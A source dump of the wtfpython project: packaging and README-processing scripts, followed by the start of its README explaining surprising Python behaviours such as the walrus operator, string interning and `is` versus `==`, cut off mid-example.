repo_name: wtfpython
repo_commit: d2673bba08d0ec2d52bb34576e1d55772e4ba0c1
File: mixed_tabs_and_spaces.py def square(x): sum_so_far = 0 for _ in range(x): sum_so_far += x return sum_so_far # noqa: E999 # pylint: disable=mixed-indentation Python 3 will raise a TabError here print(square(10)) File: wtfpython-pypi/setup.py from setuptools import setup, find_packages if __name__ == "__main__": setup(name='wtfpython', version='0.2', description='What the f*ck Python!', author="Satwik Kansal", maintainer="Satwik Kansal", maintainer_email='[email protected]', url='https://github.com/satwikkansal/wtfpython', platforms='any', license="WTFPL 2.0", long_description="An interesting collection of subtle & tricky Python Snippets" " and features.", keywords="wtfpython gotchas snippets tricky", packages=find_packages(), entry_points = { 'console_scripts': ['wtfpython = wtf_python.main:load_and_read'] }, classifiers=[ 'Development Status :: 4 - Beta', 'Environment :: Console', 'Environment :: MacOS X', 'Environment :: Win32 (MS Windows)', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'Intended Audience :: Education', 'Intended Audience :: End Users/Desktop', 'Operating System :: OS Independent', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 2', 'Topic :: Documentation', 'Topic :: Education', 'Topic :: Scientific/Engineering', 'Topic :: Software Development'], ) File: wtfpython-pypi/wtf_python/__init__.py File: wtfpython-pypi/wtf_python/main.py from os.path import dirname, join, realpath import pydoc try: from urllib.request import urlretrieve except ImportError: from urllib import urlretrieve url = ("http://raw.githubusercontent.com/satwikkansal/" "wtfpython/master/README.md") file_path = join(dirname(dirname(realpath(__file__))), "content.md") def fetch_updated_doc(): """ Fetch the latest version of the file at `url` and save it to `file_path`. If anything goes wrong, do nothing. """ try: print("Fetching the latest version...") urlretrieve(url, file_path) print("Done!") except Exception as e: print(e) print("Uh oh, failed to check for the latest version, " "using the local version for now.") def render_doc(): with open(file_path, 'r', encoding="utf-8") as f: content = f.read() pydoc.pager(content) def load_and_read(): fetch_updated_doc() render_doc() if __name__== "__main__": load_and_read() File: irrelevant/insert_ids.py import uuid new_file = [] original_file = [] fname = "../README.md" def generate_random_id_comment(): random_id = uuid.uuid4() return f"<!-- Example ID: {random_id} --!>" with open(fname, "r") as f: original_file = f.readlines() for line in original_file: new_file.append(line) if line.strip().startswith("### "): new_file.append(generate_random_id_comment()) with open(fname, "w") as f: f.write("".join(new_file)) File: irrelevant/notebook_generator.py """ An inefficient monolithic piece of code that'll generate jupyter notebook from the projects main README. PS: If you are a recruiter, please don't judge me by this piece of code. I wrote it in hurry. I know this is messy and can be simplified, but I don't want to change it much because it just works. Simplifictions and improvements through patches are more than welcome however :) #TODOs - CLI arguments for running this thing - Add it to prepush hook - Add support for skip comments, to skip examples that are not meant for notebook environment. - Use templates? 
""" import json import os import pprint fpath = os.path.join(os.path.dirname( __file__ ), '..', 'README.md') examples = [] # The globals current_example = 1 sequence_num = 1 current_section_name = "" STATEMENT_PREFIXES = ["...", ">>> ", "$ "] HOSTED_NOTEBOOK_INSTRUCTIONS = """ ## Hosted notebook instructions This is just an experimental attempt of browsing wtfpython through jupyter notebooks. Some examples are read-only because, - they either require a version of Python that's not supported in the hosted runtime. - or they can't be reproduced in the notebook envrinonment. The expected outputs are already present in collapsed cells following the code cells. The Google colab provides Python2 (2.7) and Python3 (3.6, default) runtimes. You can switch among these for Python2 specific examples. For examples specific to other minor versions, you can simply refer to collapsed outputs (it's not possible to control the minor version in hosted notebooks as of now). You can check the active version using ```py >>> import sys >>> sys.version # Prints out Python version here. ``` That being said, most of the examples do work as expected. If you face any trouble, feel free to consult the original content on wtfpython and create an issue in the repo. Have fun! --- """ def generate_code_block(statements, output): """ Generates a code block that executes the given statements. :param statements: The list of statements to execute. :type statements: list(str) """ global sequence_num result = { "type": "code", "sequence_num": sequence_num, "statements": statements, "output": output } sequence_num += 1 return result def generate_markdown_block(lines): """ Generates a markdown block from a list of lines. """ global sequence_num result = { "type": "markdown", "sequence_num": sequence_num, "value": lines } sequence_num += 1 return result def is_interactive_statement(line): for prefix in STATEMENT_PREFIXES: if line.lstrip().startswith(prefix): return True return False def parse_example_parts(lines, title, current_line): """ Parse the given lines and return a dictionary with two keys: build_up, which contains all the text before an H4 (explanation) is encountered, and explanation, which contains all the text after build_up until --- or another H3 is encountered. """ parts = { "build_up": [], "explanation": [] } content = [title] statements_so_far = [] output_so_far = [] next_line = current_line # store build_up till an H4 (explanation) is encountered while not (next_line.startswith("#### ")or next_line.startswith('---')): # Watching out for the snippets if next_line.startswith("```py"): # It's a snippet, whatever found until now is text is_interactive = False output_encountered = False if content: parts["build_up"].append(generate_markdown_block(content)) content = [] next_line = next(lines) while not next_line.startswith("```"): if is_interactive_statement(next_line): is_interactive = True if (output_so_far): parts["build_up"].append(generate_code_block(statements_so_far, output_so_far)) statements_so_far, output_so_far = [], [] statements_so_far.append(next_line) else: # can be either output or normal code if is_interactive: output_so_far.append(next_line) elif output_encountered: output_so_far.append(next_line) else: statements_so_far.append(next_line) next_line = next(lines) # Snippet is over parts["build_up"].append(generate_code_block(statements_so_far, output_so_far)) statements_so_far, output_so_far = [], [] next_line = next(lines) else: # It's a text, go on. 
content.append(next_line) next_line = next(lines) # Explanation encountered, save any content till now (if any) if content: parts["build_up"].append(generate_markdown_block(content)) # Reset stuff content = [] statements_so_far, output_so_far = [], [] # store lines again until --- or another H3 is encountered while not (next_line.startswith("---") or next_line.startswith("### ")): if next_line.lstrip().startswith("```py"): # It's a snippet, whatever found until now is text is_interactive = False if content: parts["explanation"].append(generate_markdown_block(content)) content = [] next_line = next(lines) while not next_line.lstrip().startswith("```"): if is_interactive_statement(next_line): is_interactive = True if (output_so_far): parts["explanation"].append(generate_code_block(statements_so_far, output_so_far)) statements_so_far, output_so_far = [], [] statements_so_far.append(next_line) else: # can be either output or normal code if is_interactive: output_so_far.append(next_line) else: statements_so_far.append(next_line) next_line = next(lines) # Snippet is over parts["explanation"].append(generate_code_block(statements_so_far, output_so_far)) statements_so_far, output_so_far = [], [] next_line = next(lines) else: # It's a text, go on. content.append(next_line) next_line = next(lines) # All done if content: parts["explanation"].append(generate_markdown_block(content)) return next_line, parts def remove_from_beginning(tokens, line): for token in tokens: if line.lstrip().startswith(token): line = line.replace(token, "") return line def inspect_and_sanitize_code_lines(lines): """ Remove lines from the beginning of a code block that are not statements. :param lines: A list of strings, each representing a line in the code block. :returns is_print_present, sanitized_lines: A boolean indicating whether print was present in the original code and a list of strings representing sanitized lines. The latter may be an empty list if all input lines were removed as comments or whitespace (and thus did not contain any statements). This function does not remove blank lines at the end of `lines`. """ tokens_to_remove = STATEMENT_PREFIXES result = [] is_print_present = False for line in lines: line = remove_from_beginning(tokens_to_remove, line) if line.startswith("print ") or line.startswith("print("): is_print_present = True result.append(line) return is_print_present, result def convert_to_cells(cell_contents, read_only): """ Converts a list of dictionaries containing markdown and code cells into a Jupyter notebook. :param cell_contents: A list of dictionaries, each dictionary representing either a markdown or code cell. Each dictionary should have the following keys: "type", which is either "markdown" or "code", and "value". The value for type = 'markdown' is the content as string, whereas the value for type = 'code' is another dictionary with two keys, statements and output. The statements key contains all lines in between ```py\n``` (including) until ```\n```, while output contains all lines after ```.output py\n```. :type cell_contents: List[Dict] :param read_only (optional): If True then only print outputs are included in converted cells. Default False :type read_only (optional): bool :returns A Jupyter notebook containing all cells from input parameter `cell_contents`. Each converted cell has metadata attribute collapsed set to true if it's code-cell otherwise None if it's markdow-cell. 
""" cells = [] for stuff in cell_contents: if stuff["type"] == "markdown": # todo add metadata later cells.append( { "cell_type": "markdown", "metadata": {}, "source": stuff["value"] } ) elif stuff["type"] == "code": if read_only: # Skip read only # TODO: Fix cells.append( { "cell_type": "markdown", "metadata": {}, "source": ["```py\n"] + stuff["statements"] + ["```\n"] + ["```py\n"] + stuff['output'] + ["```\n"] } ) continue is_print_present, sanitized_code = inspect_and_sanitize_code_lines(stuff["statements"]) if is_print_present: cells.append( { "cell_type": "code", "metadata": { "collapsed": True, }, "execution_count": None, "outputs": [{ "name": "stdout", "output_type": "stream", "text": stuff["output"] }], "source": sanitized_code } ) else: cells.append( { "cell_type": "code", "execution_count": None, "metadata": { "collapsed": True }, "outputs": [{ "data": { "text/plain": stuff["output"] }, "output_type": "execute_result", "metadata": {}, "execution_count": None }], "source": sanitized_code } ) return cells def convert_to_notebook(pre_examples_content, parsed_json, post_examples_content): """ Convert a JSON file containing the examples to a Jupyter Notebook. """ result = { "cells": [], "metadata": {}, "nbformat": 4, "nbformat_minor": 2 } notebook_path = "wtf.ipynb" result["cells"] += convert_to_cells([generate_markdown_block(pre_examples_content)], False) for example in parsed_json: parts = example["parts"] build_up = parts.get("build_up") explanation = parts.get("explanation") read_only = example.get("read_only") if build_up: result["cells"] += convert_to_cells(build_up, read_only) if explanation: result["cells"] += convert_to_cells(explanation, read_only) result["cells"] += convert_to_cells([generate_markdown_block(post_examples_content)], False) #pprint.pprint(result, indent=2) with open(notebook_path, "w") as f: json.dump(result, f, indent=2) with open(fpath, 'r+', encoding="utf-8") as f: lines = iter(f.readlines()) line = next(lines) result = [] pre_examples_phase = True pre_stuff = [] post_stuff = [] try: while True: if line.startswith("## "): pre_examples_phase = False # A section is encountered current_section_name = line.replace("## ", "").strip() section_text = [] line = next(lines) # Until a new section is encountered while not (line.startswith("## ") or line.startswith("# ")): # check if it's a H3 if line.startswith("### "): # An example is encountered title_line = line line = next(lines) read_only = False while line.strip() == "" or line.startswith('<!--'): #TODO: Capture example ID here using regex. if '<!-- read-only -->' in line: read_only = True line = next(lines) example_details = { "id": current_example, "title": title_line.replace("### ", ""), "section": current_section_name, "read_only": read_only } line, example_details["parts"] = parse_example_parts(lines, title_line, line) result.append(example_details) current_example += 1 else: section_text.append(line) line = next(lines) else: if pre_examples_phase: pre_stuff.append(line) else: post_stuff.append(line) line = next(lines) except StopIteration as e: #pprint.pprint(result, indent=2) pre_stuff.append(HOSTED_NOTEBOOK_INSTRUCTIONS) result.sort(key = lambda x: x["read_only"]) convert_to_notebook(pre_stuff, result, post_stuff) File: irrelevant/obsolete/generate_contributions.py """ This script parses the README.md and generates the table `CONTRIBUTORS.md`. No longer works since we've moved on contributors to CONTRIBUTORS.md entirely. 
""" import pprint import re import requests regex = ("[sS]uggested by @(\S+) in \[this\]\(https:\/\/github\.com\/satwikkansal" "\/wtf[pP]ython\/issues\/(\d+)\) issue") fname = "README.md" contribs = {} table_header = """ | Contributor | Github | Issues | |-------------|--------|--------| """ table_row = '| {} | [{}](https://github.com/{}) | {} |' issue_format = '[#{}](https:/github.com/satwikkansal/wtfpython/issues/{})' rows_so_far = [] github_rest_api = "https://api.github.com/users/{}" with open(fname, 'r') as f: file_content = f.read() matches = re.findall(regex, file_content) for match in matches: if contribs.get(match[0]) and match[1] not in contribs[match[0]]: contribs[match[0]].append(match[1]) else: contribs[match[0]] = [match[1]] for handle, issues in contribs.items(): issue_string = ', '.join([issue_format.format(i, i) for i in issues]) resp = requests.get(github_rest_api.format(handle)) name = handle if resp.status_code == 200: pprint.pprint(resp.json()['name']) else: print(handle, resp.content) rows_so_far.append(table_row.format(name, handle, handle, issue_string)) print(table_header + "\n".join(rows_so_far)) File: irrelevant/obsolete/parse_readme.py # -*- coding: utf-8 -*- """ This inefficient module would parse the README.md in the initial version of WTFPython, and enable me to categorize and reorder a hell lot of examples with the help of the file `add_categories` (part of which is automatically generated). After the refactor, this module would not work now with necessary updates in the code. """ try: raw_input # Python 2 except NameError: raw_input = input # Python 3 fname = "README.md" snippets = [] with open(fname, 'r') as f: lines = iter(f.readlines()) line = lines.next() try: while True: # check if it's a H3 if line.startswith("### "): title = line.replace("### ", "") description = [] next_line = lines.next() # store lines till an H4 (explanation) is encountered while not next_line.startswith("#### "): description.append(next_line) next_line = lines.next() explanation = [] # store lines again until --- or another H3 is encountered while not (next_line.startswith("---") or next_line.startswith("### ")): explanation.append(next_line) next_line = lines.next() # Store the results finally snippets.append({ "title": title, "description": '\n'.join(description), "explanation": '\n'.join(explanation) }) line = next_line else: line = lines.next() except StopIteration: snippets.append({ "title": title, "description": '\n'.join(description), "explanation": '\n'.join(explanation) }) ''' # Create a file file_content = "\n\n".join([snip["title"] for snip in snippets]) with open("add_categories", "w") as f: f.write(file_content) ''' snips_by_title = {} with open("add_categories", "r") as f: content = iter(f.readlines()) try: while True: title = content.next() cat = content.next().strip() is_new = True if cat[-1]=="*" else False cat = cat.replace('*','') snips_by_title[title] = { "category": cat, "is_new": is_new } content.next() except StopIteration: pass for idx, snip in enumerate(snippets): snippets[idx]["category"] = snips_by_title[snip["title"]]["category"] snippets[idx]["is_new"] = snips_by_title[snip["title"]]["is_new"] snips_by_cat = {} for snip in snippets: cat = snip["category"] if not snips_by_cat.get(cat): snips_by_cat[cat] = [] snips_by_cat[cat].append(snip) snippet_template = """ ### ▶ {title}{is_new} {description} {explanation} --- """ category_template = """ --- ## {category} {content} """ result = "" category_names = { "a": "Appearances are Deceptive!", "t": "The 
Hiddent treasures", "f": "Strain your Brain", "c": "Be careful of these", "m": "Miscallaneous" } categories_in_order = ["a", "t", "f", "c", "m"] for category in categories_in_order: snips = snips_by_cat[category] for i, snip in enumerate(snips): print(i, ":", snip["title"]) content = "" for _ in snips: snip = snips[int(raw_input())] is_new = " *" if snip["is_new"] else "" content += snippet_template.format(title=snip["title"].strip(), is_new=is_new, description=snip["description"].strip().replace("\n\n", "\n"), explanation=snip["explanation"].strip().replace("\n\n", "\n")) result += category_template.format(category=category_names[category], content=content.replace("\n\n\n", "\n\n")) with open("generated.md", "w") as f: f.write(result.replace("\n\n\n", "\n\n")) print("Done!")
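For context on what the notebook generator above emits: `convert_to_notebook()` in `irrelevant/notebook_generator.py` assembles its cells into the nbformat v4 JSON layout. The following is only a minimal sketch of that shape (the two cells and the `minimal.ipynb` filename are illustrative placeholders, not the script's actual output):

```py
import json

# A minimal nbformat-v4 skeleton, similar in shape to what
# convert_to_notebook() writes out; the cell contents are placeholders.
minimal_notebook = {
    "cells": [
        {
            "cell_type": "markdown",
            "metadata": {},
            "source": ["### ▶ Some fancy Title\n"],
        },
        {
            "cell_type": "code",
            "execution_count": None,
            "metadata": {"collapsed": True},
            "outputs": [],
            "source": ["print('wtf')\n"],
        },
    ],
    "metadata": {},
    "nbformat": 4,
    "nbformat_minor": 2,
}

with open("minimal.ipynb", "w") as f:
    json.dump(minimal_notebook, f, indent=2)
```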
<p align="center"><img src="/images/logo.png#gh-light-mode-only" alt=""><img src="/images/logo-dark.png#gh-dark-mode-only" alt=""></p> <h1 align="center">What the f*ck Python! 😱</h1> <p align="center">Exploring and understanding Python through surprising snippets.</p> Translations: [Chinese 中文](https://github.com/leisurelicht/wtfpython-cn) | [Vietnamese Tiếng Việt](https://github.com/vuduclyunitn/wtfptyhon-vi) | [Spanish Español](https://web.archive.org/web/20220511161045/https://github.com/JoseDeFreitas/wtfpython-es) | [Korean 한국어](https://github.com/buttercrab/wtfpython-ko) | [Russian Русский](https://github.com/satwikkansal/wtfpython/tree/master/translations/ru-russian) | [German Deutsch](https://github.com/BenSt099/wtfpython) | [Add translation](https://github.com/satwikkansal/wtfpython/issues/new?title=Add%20translation%20for%20[LANGUAGE]&body=Expected%20time%20to%20finish:%20[X]%20weeks.%20I%27ll%20start%20working%20on%20it%20from%20[Y].) Other modes: [Interactive Website](https://wtfpython-interactive.vercel.app) | [Interactive Notebook](https://colab.research.google.com/github/satwikkansal/wtfpython/blob/master/irrelevant/wtf.ipynb) | [CLI](https://pypi.python.org/pypi/wtfpython) Python, being a beautifully designed high-level and interpreter-based programming language, provides us with many features for the programmer's comfort. But sometimes, the outcomes of a Python snippet may not seem obvious at first sight. Here's a fun project attempting to explain what exactly is happening under the hood for some counter-intuitive snippets and lesser-known features in Python. While some of the examples you see below may not be WTFs in the truest sense, but they'll reveal some of the interesting parts of Python that you might be unaware of. I find it a nice way to learn the internals of a programming language, and I believe that you'll find it interesting too! If you're an experienced Python programmer, you can take it as a challenge to get most of them right in the first attempt. You may have already experienced some of them before, and I might be able to revive sweet old memories of yours! :sweat_smile: PS: If you're a returning reader, you can learn about the new modifications [here](https://github.com/satwikkansal/wtfpython/releases/) (the examples marked with asterisk are the ones added in the latest major revision). So, here we go... # Table of Contents <!-- Generated using "markdown-toc -i README.md --maxdepth 3"--> <!-- toc --> - [Structure of the Examples](#structure-of-the-examples) + [▶ Some fancy Title](#-some-fancy-title) - [Usage](#usage) - [👀 Examples](#-examples) * [Section: Strain your brain!](#section-strain-your-brain) + [▶ First things first! *](#-first-things-first-) + [▶ Strings can be tricky sometimes](#-strings-can-be-tricky-sometimes) + [▶ Be careful with chained operations](#-be-careful-with-chained-operations) + [▶ How not to use `is` operator](#-how-not-to-use-is-operator) + [▶ Hash brownies](#-hash-brownies) + [▶ Deep down, we're all the same.](#-deep-down-were-all-the-same) + [▶ Disorder within order *](#-disorder-within-order-) + [▶ Keep trying... 
*](#-keep-trying-) + [▶ For what?](#-for-what) + [▶ Evaluation time discrepancy](#-evaluation-time-discrepancy) + [▶ `is not ...` is not `is (not ...)`](#-is-not--is-not-is-not-) + [▶ A tic-tac-toe where X wins in the first attempt!](#-a-tic-tac-toe-where-x-wins-in-the-first-attempt) + [▶ Schrödinger's variable](#-schrödingers-variable-) + [▶ The chicken-egg problem *](#-the-chicken-egg-problem-) + [▶ Subclass relationships](#-subclass-relationships) + [▶ Methods equality and identity](#-methods-equality-and-identity) + [▶ All-true-ation *](#-all-true-ation-) + [▶ The surprising comma](#-the-surprising-comma) + [▶ Strings and the backslashes](#-strings-and-the-backslashes) + [▶ not knot!](#-not-knot) + [▶ Half triple-quoted strings](#-half-triple-quoted-strings) + [▶ What's wrong with booleans?](#-whats-wrong-with-booleans) + [▶ Class attributes and instance attributes](#-class-attributes-and-instance-attributes) + [▶ yielding None](#-yielding-none) + [▶ Yielding from... return! *](#-yielding-from-return-) + [▶ Nan-reflexivity *](#-nan-reflexivity-) + [▶ Mutating the immutable!](#-mutating-the-immutable) + [▶ The disappearing variable from outer scope](#-the-disappearing-variable-from-outer-scope) + [▶ The mysterious key type conversion](#-the-mysterious-key-type-conversion) + [▶ Let's see if you can guess this?](#-lets-see-if-you-can-guess-this) + [▶ Exceeds the limit for integer string conversion](#-exceeds-the-limit-for-integer-string-conversion) * [Section: Slippery Slopes](#section-slippery-slopes) + [▶ Modifying a dictionary while iterating over it](#-modifying-a-dictionary-while-iterating-over-it) + [▶ Stubborn `del` operation](#-stubborn-del-operation) + [▶ The out of scope variable](#-the-out-of-scope-variable) + [▶ Deleting a list item while iterating](#-deleting-a-list-item-while-iterating) + [▶ Lossy zip of iterators *](#-lossy-zip-of-iterators-) + [▶ Loop variables leaking out!](#-loop-variables-leaking-out) + [▶ Beware of default mutable arguments!](#-beware-of-default-mutable-arguments) + [▶ Catching the Exceptions](#-catching-the-exceptions) + [▶ Same operands, different story!](#-same-operands-different-story) + [▶ Name resolution ignoring class scope](#-name-resolution-ignoring-class-scope) + [▶ Rounding like a banker *](#-rounding-like-a-banker-) + [▶ Needles in a Haystack *](#-needles-in-a-haystack-) + [▶ Splitsies *](#-splitsies-) + [▶ Wild imports *](#-wild-imports-) + [▶ All sorted? 
*](#-all-sorted-) + [▶ Midnight time doesn't exist?](#-midnight-time-doesnt-exist) * [Section: The Hidden treasures!](#section-the-hidden-treasures) + [▶ Okay Python, Can you make me fly?](#-okay-python-can-you-make-me-fly) + [▶ `goto`, but why?](#-goto-but-why) + [▶ Brace yourself!](#-brace-yourself) + [▶ Let's meet Friendly Language Uncle For Life](#-lets-meet-friendly-language-uncle-for-life) + [▶ Even Python understands that love is complicated](#-even-python-understands-that-love-is-complicated) + [▶ Yes, it exists!](#-yes-it-exists) + [▶ Ellipsis *](#-ellipsis-) + [▶ Inpinity](#-inpinity) + [▶ Let's mangle](#-lets-mangle) * [Section: Appearances are deceptive!](#section-appearances-are-deceptive) + [▶ Skipping lines?](#-skipping-lines) + [▶ Teleportation](#-teleportation) + [▶ Well, something is fishy...](#-well-something-is-fishy) * [Section: Miscellaneous](#section-miscellaneous) + [▶ `+=` is faster](#--is-faster) + [▶ Let's make a giant string!](#-lets-make-a-giant-string) + [▶ Slowing down `dict` lookups *](#-slowing-down-dict-lookups-) + [▶ Bloating instance `dict`s *](#-bloating-instance-dicts-) + [▶ Minor Ones *](#-minor-ones-) - [Contributing](#contributing) - [Acknowledgements](#acknowledgements) - [🎓 License](#-license) * [Surprise your friends as well!](#surprise-your-friends-as-well) * [More content like this?](#more-content-like-this) <!-- tocstop --> # Structure of the Examples All the examples are structured like below: > ### ▶ Some fancy Title > > ```py > # Set up the code. > # Preparation for the magic... > ``` > > **Output (Python version(s)):** > > ```py > >>> triggering_statement > Some unexpected output > ``` > (Optional): One line describing the unexpected output. > > > #### 💡 Explanation: > > * Brief explanation of what's happening and why is it happening. > ```py > # Set up code > # More examples for further clarification (if necessary) > ``` > **Output (Python version(s)):** > > ```py > >>> trigger # some example that makes it easy to unveil the magic > # some justified output > ``` **Note:** All the examples are tested on Python 3.5.2 interactive interpreter, and they should work for all the Python versions unless explicitly specified before the output. # Usage A nice way to get the most out of these examples, in my opinion, is to read them in sequential order, and for every example: - Carefully read the initial code for setting up the example. If you're an experienced Python programmer, you'll successfully anticipate what's going to happen next most of the time. - Read the output snippets and, + Check if the outputs are the same as you'd expect. + Make sure if you know the exact reason behind the output being the way it is. - If the answer is no (which is perfectly okay), take a deep breath, and read the explanation (and if you still don't understand, shout out! and create an issue [here](https://github.com/satwikkansal/wtfpython/issues/new)). - If yes, give a gentle pat on your back, and you may skip to the next example. PS: You can also read WTFPython at the command line using the [pypi package](https://pypi.python.org/pypi/wtfpython), ```sh $ pip install wtfpython -U $ wtfpython ``` --- # 👀 Examples ## Section: Strain your brain! ### ▶ First things first! * <!-- Example ID: d3d73936-3cf1-4632-b5ab-817981338863 --> <!-- read-only --> For some reason, the Python 3.8's "Walrus" operator (`:=`) has become quite popular. Let's check it out, 1\. 
```py # Python version 3.8+ >>> a = "wtf_walrus" >>> a 'wtf_walrus' >>> a := "wtf_walrus" File "<stdin>", line 1 a := "wtf_walrus" ^ SyntaxError: invalid syntax >>> (a := "wtf_walrus") # This works though 'wtf_walrus' >>> a 'wtf_walrus' ``` 2 \. ```py # Python version 3.8+ >>> a = 6, 9 >>> a (6, 9) >>> (a := 6, 9) (6, 9) >>> a 6 >>> a, b = 6, 9 # Typical unpacking >>> a, b (6, 9) >>> (a, b = 16, 19) # Oops File "<stdin>", line 1 (a, b = 16, 19) ^ SyntaxError: invalid syntax >>> (a, b := 16, 19) # This prints out a weird 3-tuple (6, 16, 19) >>> a # a is still unchanged? 6 >>> b 16 ``` #### 💡 Explanation **Quick walrus operator refresher** The Walrus operator (`:=`) was introduced in Python 3.8, it can be useful in situations where you'd want to assign values to variables within an expression. ```py def some_func(): # Assume some expensive computation here # time.sleep(1000) return 5 # So instead of, if some_func(): print(some_func()) # Which is bad practice since computation is happening twice # or a = some_func() if a: print(a) # Now you can concisely write if a := some_func(): print(a) ``` **Output (> 3.8):** ```py 5 5 5 ``` This saved one line of code, and implicitly prevented invoking `some_func` twice. - Unparenthesized "assignment expression" (use of walrus operator), is restricted at the top level, hence the `SyntaxError` in the `a := "wtf_walrus"` statement of the first snippet. Parenthesizing it worked as expected and assigned `a`. - As usual, parenthesizing of an expression containing `=` operator is not allowed. Hence the syntax error in `(a, b = 6, 9)`. - The syntax of the Walrus operator is of the form `NAME:= expr`, where `NAME` is a valid identifier, and `expr` is a valid expression. Hence, iterable packing and unpacking are not supported which means, - `(a := 6, 9)` is equivalent to `((a := 6), 9)` and ultimately `(a, 9) ` (where `a`'s value is 6') ```py >>> (a := 6, 9) == ((a := 6), 9) True >>> x = (a := 696, 9) >>> x (696, 9) >>> x[0] is a # Both reference same memory location True ``` - Similarly, `(a, b := 16, 19)` is equivalent to `(a, (b := 16), 19)` which is nothing but a 3-tuple. --- ### ▶ Strings can be tricky sometimes <!-- Example ID: 30f1d3fc-e267-4b30-84ef-4d9e7091ac1a ---> 1\. ```py >>> a = "some_string" >>> id(a) 140420665652016 >>> id("some" + "_" + "string") # Notice that both the ids are same. 140420665652016 ``` 2\. ```py >>> a = "wtf" >>> b = "wtf" >>> a is b True >>> a = "wtf!" >>> b = "wtf!" >>> a is b False ``` 3\. ```py >>> a, b = "wtf!", "wtf!" >>> a is b # All versions except 3.7.x True >>> a = "wtf!"; b = "wtf!" >>> a is b # This will print True or False depending on where you're invoking it (python shell / ipython / as a script) False ``` ```py # This time in file some_file.py a = "wtf!" b = "wtf!" print(a is b) # prints True when the module is invoked! ``` 4\. **Output (< Python3.7 )** ```py >>> 'a' * 20 is 'aaaaaaaaaaaaaaaaaaaa' True >>> 'a' * 21 is 'aaaaaaaaaaaaaaaaaaaaa' False ``` Makes sense, right? #### 💡 Explanation: + The behavior in first and second snippets is due to a CPython optimization (called string interning) that tries to use existing immutable objects in some cases rather than creating a new object every time. + After being "interned," many variables may reference the same string object in memory (saving memory thereby). + In the snippets above, strings are implicitly interned. The decision of when to implicitly intern a string is implementation-dependent. 
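If you want interning regardless of these implementation details, you can request it explicitly with `sys.intern` (a small illustrative snippet; the point is only that explicitly interned equal strings share one object):

```py
>>> import sys
>>> a = sys.intern("wtf!")
>>> b = sys.intern("wtf!")
>>> a is b  # explicitly interned strings refer to the same object
True
```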
There are some rules that can be used to guess if a string will be interned or not: * All length 0 and length 1 strings are interned. * Strings are interned at compile time (`'wtf'` will be interned but `''.join(['w', 't', 'f'])` will not be interned) * Strings that are not composed of ASCII letters, digits or underscores, are not interned. This explains why `'wtf!'` was not interned due to `!`. CPython implementation of this rule can be found [here](https://github.com/python/cpython/blob/3.6/Objects/codeobject.c#L19) ![image](/images/string-intern/string_intern.png) + When `a` and `b` are set to `"wtf!"` in the same line, the Python interpreter creates a new object, then references the second variable at the same time. If you do it on separate lines, it doesn't "know" that there's already `"wtf!"` as an object (because `"wtf!"` is not implicitly interned as per the facts mentioned above). It's a compile-time optimization. This optimization doesn't apply to 3.7.x versions of CPython (check this [issue](https://github.com/satwikkansal/wtfpython/issues/100) for more discussion). + A compile unit in an interactive environment like IPython consists of a single statement, whereas it consists of the entire module in case of modules. `a, b = "wtf!", "wtf!"` is single statement, whereas `a = "wtf!"; b = "wtf!"` are two statements in a single line. This explains why the identities are different in `a = "wtf!"; b = "wtf!"`, and also explain why they are same when invoked in `some_file.py` + The abrupt change in the output of the fourth snippet is due to a [peephole optimization](https://en.wikipedia.org/wiki/Peephole_optimization) technique known as Constant folding. This means the expression `'a'*20` is replaced by `'aaaaaaaaaaaaaaaaaaaa'` during compilation to save a few clock cycles during runtime. Constant folding only occurs for strings having a length of less than 21. (Why? Imagine the size of `.pyc` file generated as a result of the expression `'a'*10**10`). [Here's](https://github.com/python/cpython/blob/3.6/Python/peephole.c#L288) the implementation source for the same. + Note: In Python 3.7, Constant folding was moved out from peephole optimizer to the new AST optimizer with some change in logic as well, so the fourth snippet doesn't work for Python 3.7. You can read more about the change [here](https://bugs.python.org/issue11549). --- ### ▶ Be careful with chained operations <!-- Example ID: 07974979-9c86-4720-80bd-467aa19470d9 ---> ```py >>> (False == False) in [False] # makes sense False >>> False == (False in [False]) # makes sense False >>> False == False in [False] # now what? True >>> True is False == False False >>> False is False is False True >>> 1 > 0 < 1 True >>> (1 > 0) < 1 False >>> 1 > (0 < 1) False ``` #### 💡 Explanation: As per https://docs.python.org/3/reference/expressions.html#comparisons > Formally, if a, b, c, ..., y, z are expressions and op1, op2, ..., opN are comparison operators, then a op1 b op2 c ... y opN z is equivalent to a op1 b and b op2 c and ... y opN z, except that each expression is evaluated at most once. While such behavior might seem silly to you in the above examples, it's fantastic with stuff like `a == b == c` and `0 <= x <= 100`. * `False is False is False` is equivalent to `(False is False) and (False is False)` * `True is False == False` is equivalent to `(True is False) and (False == False)` and since the first part of the statement (`True is False`) evaluates to `False`, the overall expression evaluates to `False`. 
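You can check the chaining rule by writing out the expanded form by hand (a quick sketch of the desugaring for the first snippet):

```py
>>> False == False in [False]                    # chained comparison
True
>>> (False == False) and (False in [False])      # its expanded equivalent
True
>>> (False == False) in [False]                  # explicit grouping changes the meaning
False
```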
* `1 > 0 < 1` is equivalent to `(1 > 0) and (0 < 1)` which evaluates to `True`. * The expression `(1 > 0) < 1` is equivalent to `True < 1` and ```py >>> int(True) 1 >>> True + 1 #not relevant for this example, but just for fun 2 ``` So, `1 < 1` evaluates to `False` --- ### ▶ How not to use `is` operator <!-- Example ID: 230fa2ac-ab36-4ad1-b675-5f5a1c1a6217 ---> The following is a very famous example present all over the internet. 1\. ```py >>> a = 256 >>> b = 256 >>> a is b True >>> a = 257 >>> b = 257 >>> a is b False ``` 2\. ```py >>> a = [] >>> b = [] >>> a is b False >>> a = tuple() >>> b = tuple() >>> a is b True ``` 3\. **Output** ```py >>> a, b = 257, 257 >>> a is b True ``` **Output (Python 3.7.x specifically)** ```py >>> a, b = 257, 257 >>> a is b False ``` #### 💡 Explanation: **The difference between `is` and `==`** * `is` operator checks if both the operands refer to the same object (i.e., it checks if the identity of the operands matches or not). * `==` operator compares the values of both the operands and checks if they are the same. * So `is` is for reference equality and `==` is for value equality. An example to clear things up, ```py >>> class A: pass >>> A() is A() # These are two empty objects at two different memory locations. False ``` **`256` is an existing object but `257` isn't** When you start up python the numbers from `-5` to `256` will be allocated. These numbers are used a lot, so it makes sense just to have them ready. Quoting from https://docs.python.org/3/c-api/long.html > The current implementation keeps an array of integer objects for all integers between -5 and 256, when you create an int in that range you just get back a reference to the existing object. So it should be possible to change the value of 1. I suspect the behavior of Python, in this case, is undefined. :-) ```py >>> id(256) 10922528 >>> a = 256 >>> b = 256 >>> id(a) 10922528 >>> id(b) 10922528 >>> id(257) 140084850247312 >>> x = 257 >>> y = 